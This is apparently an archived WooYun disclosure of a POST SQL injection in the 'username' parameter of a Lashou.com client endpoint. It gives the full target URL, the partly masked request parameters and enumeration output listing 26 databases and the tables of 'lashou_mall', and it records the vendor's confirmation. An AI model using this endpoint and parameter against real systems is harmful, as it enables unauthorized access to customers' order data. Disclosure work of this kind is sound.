乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-02-19: 细节已通知厂商并且等待厂商处理中 2014-02-20: 厂商已经确认,细节仅向厂商公开 2014-03-02: 细节向核心白帽子及相关领域专家公开 2014-03-12: 细节向普通白帽子公开 2014-03-22: 细节向实习白帽子公开 2014-04-05: 细节向公众公开
POST SQL注入一枚多库 大量敏感信息
URL:
http://go.client.lashou.com:80/index.php/Seven/mylist/cancel_order/STID/groupbuy_4.82_ipad_10000_c9ea79576bf848d860b1a9820e286df4fd483e88_43746679_2419_iPad4,1_7.0.4_43D1A5CC-C1A4-4EAA-A833-E376C5849BAD_c9ea79576bf848d860b1a9820e286df4fd483e88POST:password=5416d7***855e84&username=niliu&time=1392819709&sign=84badb52147fcf003d33e5a939e9&trade_no=793411522a66e2519
username参数过滤不严存在注入
26个数据库
available databases [26]:[*] `EN[*] `hotel[*] `lashoblog`[*] `lashou_sem`[*] `lashou_ssb[*] `lgolR`[*] `nyqrlB:`[*] `odntqm`[*] `smgu:C#[*] `tgonUW[*] `tipt[*] adbrgss[*] dataminihg[*] dating[*] game_togk[*] house[*] hui[*] information_schema[*] lashou_acriviry[*] lashou_dianping[*] lashou_hlpel[*] lashou_huk[*] lashou_jd[*] lashou_mall[*] lodpo[*] mylpp
Database: lashou_mall[23 tables]+-----------------------------+| mall_activity_category || mall_brand || mall_brand_category || mall_brand_category_2 || mall_brand_goods || mall_brand_merchant || mall_brand_promotion || mall_brand_tuangou_cat || mall_category || mall_category_goods || mall_category_goods_2 || mall_category_merchant || mall_category_merchant_2 || mall_index_category_brand || mall_index_category_brand_2 || mall_index_goods || mall_index_publish || mall_online_cat || online_index_log || tuangou_mall_shop || tuangou_mall_sp_cat || up_goods_online || up_sgoods_online |+-----------------------------+
一号店,京东,淘宝等各种订单数据
#过滤相关参数#求20rank!
危害等级:高
漏洞Rank:18
确认时间:2014-02-20 09:42
已经告知开发,紧急处理,感谢
暂无
